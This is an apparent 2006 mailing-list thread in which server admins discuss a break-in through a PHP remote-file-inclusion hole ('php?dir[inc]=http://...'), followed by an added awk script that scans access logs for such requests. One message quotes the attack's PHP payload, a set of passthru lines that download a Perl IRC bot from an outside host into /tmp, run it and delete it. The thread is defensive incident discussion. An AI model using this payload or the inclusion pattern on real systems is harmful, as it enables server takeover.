:o oh my god... have been trying for the last 2 days to work out what
was up with my server, and that's it....
I seem to have the following in my /tmp folder :
total 44
drwxrwxrwt 5 root root 4096 Sep 11 23:11 .
drwxr-xr-x 25 root root 4096 Sep 11 22:10 ..
-rw------- 1 root root 49 Sep 11 23:11 ClamAVBusy.lock
drwxrwxrwt 2 root root 4096 Sep 11 22:10 .ICE-unix
drwxr-xr-x 10 apache apache 4096 Sep 11 22:09 .LiveZone
drwxr-xr-x 9 apache apache 4096 Sep 11 23:06 matahati
-rw------- 1 root root 4697 Sep 9 21:35 .spamassassin4037sdcX9Htmp
-r--r--r-- 1 root root 275 Sep 11 23:01 yum.check-update
-rw-r--r-- 1 root root 1367 Sep 11 05:31 yum.update
Now the Clam I can understand. The yum and the SpamAssassin also. The
rest shouldn't be there and need to be removed.
Please PLEASE could someone tell me how I can rid myself of this!
Now I know why I'm getting Perl scripts hanging, using 98% CPU time, and
the box load hits over 50 and things stop working!
Please help... It's only a home box with a couple of sites on it, but I
want to get it back!!
Thanks
Paul
Paul Wilson - Swift Internet wrote:
> It is also likely that your PHP script has a severe vulnerability in it.
>
> I think the attack was in two parts - did you see the php script being
> used in the following way (check your access_log)?
>
> ****php?dir[inc]=http:// "URL location of attack script"
>
> This script would then be run to pull in the v6 script that you saw in
> action.
>
>
> The "php?dir[inc]" vulnerability became known at the tail end of
> August, so these attacks are going to become more widespread.
>
> And yes, one of our servers was hit this way.
>
>
> Regards
>
> Paul
>
>
> ----- Original Message ----- From: "Darrell D. Mobley"
> <dmobley (at mark) uhostme.net>
> To: <coba-e (at mark) bluequartz.org>
> Sent: Saturday, September 09, 2006 9:44 PM
> Subject: [coba-e:06808] /TMP Directory
>
>
>> There was some discussion here lately about the security fix that stopped
>> programs from running in /TMP. Is this configured by default if you have
>> your BQ Yum updated? I got a DDOS today where the users were trying to run
>> the following program via PHP:
>>
>> <?
>> passthru('cd /tmp;wget http://perqafohu.com/~armendibx/oki/v6.txt;perl
>> v6.txt;rm -f v6*');
>> passthru('cd /tmp;curl -O
>> http://perqafohu.com/~armendibx/oki/v6.txt;perl
>> v6.txt;rm -f v6*');
>> passthru('cd /tmp;lwp-download
>> http://perqafohu.com/~armendibx/oki/v6.txt;perl v6.txt;rm -f v6*');
>> passthru('cd /tmp;lynx -source
>> http://perqafohu.com/~armendibx/oki/v6.txt
>>> v6.txt;perl v6.txt;rm -f v6*');
>> passthru('cd /tmp;fetch http://perqafohu.com/~armendibx/oki/v6.txt
>>> v6.txt;perl v6.txt;rm -f v6*');
>> passthru('cd /tmp;GET http://perqafohu.com/~armendibx/oki/v6.txt
>>> v6.txt;perl v6.txt;rm -f v6*');
>> ?>
>>
>> The v6.txt is a Perl script that installs some IRC software and monitors IRC
>> on open ports. I do not think the script was successful in running, but I
>> just want to make sure the /TMP security is enabled where files can't be run
>> there. While I don't think the DDOS attack was successful in running the
>> script, it was successful in shutting down the server due to MySQL becoming
>> overwhelmed. Server load was up to 156!
>>
>> Any suggestions would be appreciated.
>>
>>
>
>
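As an added example (not code from anyone in this thread), here is a small shell/awk scanner for the "php?dir[inc]=http://..." remote-file-inclusion pattern that Paul Wilson suggests looking for in access_log. The log lines and hostnames are constructed for the demonstration, and the format assumed is Apache's common/combined log format.

```shell
#!/bin/sh
# Scan Apache access_log lines for remote-file-inclusion attempts: any query
# parameter whose value starts with a remote URL scheme, plain or URL-encoded.
# Usage on a real box:  find_rfi < /var/log/httpd/access_log

# Constructed sample log lines (not real traffic); the hostnames are fictitious.
SAMPLE_LOG='10.0.0.5 - - [11/Sep/2006:23:01:12 +0100] "GET /index.php?page=home HTTP/1.1" 200 5123
10.0.0.9 - - [11/Sep/2006:23:02:44 +0100] "GET /inc/main.php?dir[inc]=http://example.invalid/v6.txt? HTTP/1.0" 200 311
10.0.0.9 - - [11/Sep/2006:23:02:50 +0100] "GET /gallery.php?img=ftp://example.invalid/x.gif HTTP/1.0" 404 220
10.0.0.7 - - [11/Sep/2006:23:03:01 +0100] "GET /page.php?url=https%3A%2F%2Fexample.invalid%2Fshell.txt HTTP/1.1" 200 99'

# find_rfi: read log lines on stdin; print "ip path parameter" for each request
# carrying a parameter value that begins with http://, https:// or ftp://
# (also catching the percent-encoded form, since attackers often encode it).
find_rfi() {
  awk '
  {
    ip = $1
    # The request line is the first double-quoted field: method target protocol
    split($0, q, "\"")
    split(q[2], r, " ")
    target = r[2]
    n = index(target, "?")
    if (n == 0) next                      # no query string, nothing to check
    path = substr(target, 1, n - 1)
    qs = substr(target, n + 1)
    cnt = split(qs, kv, "&")
    for (i = 1; i <= cnt; i++) {
      eq = index(kv[i], "=")
      if (eq == 0) continue
      val = tolower(substr(kv[i], eq + 1))
      if (val ~ "^(https?|ftp)://" || val ~ "^(https?|ftp)%3a%2f%2f") {
        print ip, path, substr(kv[i], 1, eq - 1)
      }
    }
  }'
}

# count_rfi: number of suspicious requests found in the constructed sample.
count_rfi() {
  printf '%s\n' "$SAMPLE_LOG" | find_rfi | wc -l | tr -d ' '
}
```

Feed the output into a per-IP count (e.g. `find_rfi < access_log | awk '{print $1}' | sort | uniq -c`) to see which client hammered which script, which is also the first thing to block or rate-limit while the vulnerable include is fixed.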